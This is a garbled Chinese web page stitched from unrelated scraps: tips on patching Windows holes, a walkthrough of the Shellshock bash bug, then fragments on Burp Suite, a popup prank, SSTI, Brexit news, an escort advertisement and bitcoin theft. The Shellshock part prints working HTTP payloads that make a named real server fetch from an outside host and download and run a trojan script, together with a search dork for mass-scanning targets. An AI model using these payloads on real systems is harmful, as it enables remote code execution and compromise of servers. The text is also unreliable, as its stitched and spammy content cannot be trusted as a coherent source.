1.用记事本编辑如下内容: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}] "Compatibility Flags"=dword:00000400 2.把文件名改为:quicktime.reg 3.运行--点确定--再禁用远程控制 4.或禁用80端口,可是禁用以后就游览不到网页! 5.修补漏洞! 6.查杀还有没有病毒! 7.重做系统也可以!
主要指你开了一些不必要的端口,或者你电脑能执行某些远程代码。其后果是你的电脑被沦为别人的肉鸡,从而导致个人隐私或者资料泄漏!
电脑你肯定得修复漏洞的,不然很容易被黑客远程控制,也许是师傅希望你再去他那里修电脑,所以不让你自己修复漏洞吧
它修复漏洞所使用的补丁是来自微软的,并且经过专业人员筛选的补丁,
过滤掉了微软推送的不稳定的和用户不需要的补丁,如正版验证补丁,
你可以放心的修复
一、黑容发现系统的漏洞的途径一般不外两方面,一是偶然性的发现(所谓的碰巧),另一种是得到了核心资料后根据分析发现。
二、为什么会有漏洞,简单地说,这个世界上基本不存在完美的东西,电脑操作系统也是一样的。
1、当前的主流系统是非常复杂的,而一个复杂的东西就很难做到没有尽善尽美,这就是所谓的毛病、漏洞。就象世界贸易中心大楼一样,也许风吹不倒,地动也不倒,飞机一撞就倒了。
2、一个系统,在使用时,可能面对各种各样的情况,而且很多情况是设计时根本不存在的。还是比如世界贸易中心,谁会想到用飞机去撞它呢!退一步,就算不用飞机去撞它吧,也许破坏份子就能从下水道、通风口进入内里,在里面放炸弹……
3、所以,一个复杂的系统,如果有足够的资料去了解它,去研究它,往往可以找到很多 *** 去破坏它,去非法篡改它。
三、为什么微软当初发现不了?
这太难为微软了,无论哪个公司都做不出完美的东西。何况自个的错往往自个发现不了,那也是最常见的规律,所谓的当局者迷。
之一:对电脑进行安装补丁 第二:杀毒软件和防火墙必须时常升级 第三:查看网站是否有漏洞,看看有没有可疑文件. 第四:关闭一有害端口, 现在有些黑客叫不上黑客 有些都是些菜鸟,他们得到的虚荣心觉得自己能够进入这个网站后台和电脑来炫耀自己
从昨天开始,这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf,大家都在谈论,“互联网的心脏又出血了”,可是,亲,到底怎么对网站进行测试?下面这段脚本
$ env x=‘() { :;}; echo vulnerable' bash -c "echo this is a test"
真的如各路大神们说的这样吗?
它与“心脏出血”漏洞不同,“心脏出血”只能借助窃取用户电脑信息,而bash 漏洞允许黑客远程控制电脑,拿到系统更高权限!其 *** 利用就更简单了——复制/粘贴一行命令代码即可!
Bash漏洞为什么能够执行
Bash漏洞的原理:
BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。
此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令。
简单地说就是,Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令。
Bash漏洞与远程执行有啥联系
看到上面的解释,很多童鞋都理解成了本地的漏洞,然后很多人又觉得,本地有啥可以利用的,于是就忽略了这个神级漏洞的存在。我想说的是,这个漏洞,利用热度可以媲美当年的MS08-067,威力虽然弱了点,但远程控制电脑还是可以的。
首先解释一下cgi脚本。很多网站类似下面的链接:
GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1
后台不仅仅用python、Perl来解释执行并反馈给客户端Response,当然还可以换做bash脚本来解释执行提交上来的GET/POST请求。所以,理论上,你在HTTP请求中插入一个Bash命令,比如
() { :;}; wget http://www.myvps.org/testvul.sh
如果服务器的Bash解释器具有这个漏洞,那么在解释上面这这句话的时候就会执行wget请求,将一个恶意的testvul.sh文件下载到这个服务器,那为何说要放在HTTP头部呢?比如:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive
这是因为这个漏洞是bash解释器在解释某些特殊的变量时才可以触发的:
在于BASH处理以“(){”开头的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令
通过自定义这些参数的值为“函数环境变量”的形式,就可以触发后面的命令,恶意的客户仅需要发送特殊构造的HTTP请求就可以使服务器执行特定的命令(命令的权限和解释HTTP请求的Bash脚本环境相同)。
实际测试中,我的构造的测试请求:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive
过程是这样的:
我发送GET请求–目标服务器cgi路径
目标服务器解析这个get请求,碰到UserAgent后面的参数,Bash解释器就执行了后面的命令
目标服务器wget–我的myvps.org
我的vps记录下这个访问的IP地址
然后查看我的myvps.org服务器的访问记录,就可以确定目标有没有去访问,如果访问了,那么,很好,它是有漏洞的。下面是我的VPS接收到的wget请求访问的日志:
大神是这样测试漏洞的
当然,你也可以这样构造:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive
实际上执行了下面三句:
/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh
你会发现,脚本就执行了,这就是Bash漏洞利用测试的精髓。
当然,你可以利用批量Google搜索:
filetype:cgi inurl:cgi-bin site:jp
然后批量提交类似的GET请求,你就能做到批量测试了。测试表明,500个url里有6-8个有bash漏洞
漏洞是指应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误,
这个缺陷或错误可以被不法者或者电脑黑客利用。修补漏洞,可以用腾讯电脑管家,
修复漏洞,强大智能的漏洞修复工具,全面修复微软系统漏洞和第三方软件漏洞。
金山卫士似乎会关闭掉远程认为可疑,360卫士只能作为辅助,而金山毒霸才是杀毒和防御。如果有病毒或者漏洞应该修复。毕竟金山很有实力。当同时安装360和见南山卫士,有时系统有漏洞,用金山修复时,360会提示有威胁,其实那些补丁都很重要。个人建议使用金山毒霸2012和金山卫士
-t界说暗码输出格局在这个链接中,老外给了一个burpsuite的包,咱们能够重载包来康复状况,康复后就有4个Repeater,咱们只需把host跟target都修正成方针顺次发包就能够了!...
炸弹弹屏,也可以叫炸弹弹窗,是可以使用txt制作的一个小程序,效果就是执行程序后会一直不停地弹出窗口,就好像炸弹轰炸一样,如图所示,用来恶作剧很好玩。该怎么制作这个无限弹窗效果呢?下面我们就来看看详细...
假如你还没听说过SSTI(服务端模版注入),或许对其还不够了解,在此之前主张咱们去阅览一下James Kettle写的一篇文章。 作为一名专业的安全从事人员,咱们的作业便是协助企业安排进行危险决议计划...
(财经天下)“脱欧”一周年,英国欲借CPTPP谋出路? 中新社北京2月1日电 (刘亮)正式“脱欧”刚满一周年,英国就将目光投向了亚太。英国政府日前宣布,将于2月1日正式申请加入“全面与进步跨...
“澳门高端伴游-【鲁芳】” 抚顺的甘露先生的评价:找一个安全可信的平台不容易,以后都不会换别家啦。模特资料 模特资料:身高173,体重51kg,在职模特。作为职业的模特,这位女士可以满足各位成功高端商...
本文导读目录: 1、比特币有什么风险? 2、为什么黑客可以盗取比特币 3、比特币现金被黑客攻击过吗? 4、黑客为什么没人破解比特币 5、比特币在一些平台中不会被盗钱的盗走吧? 6、...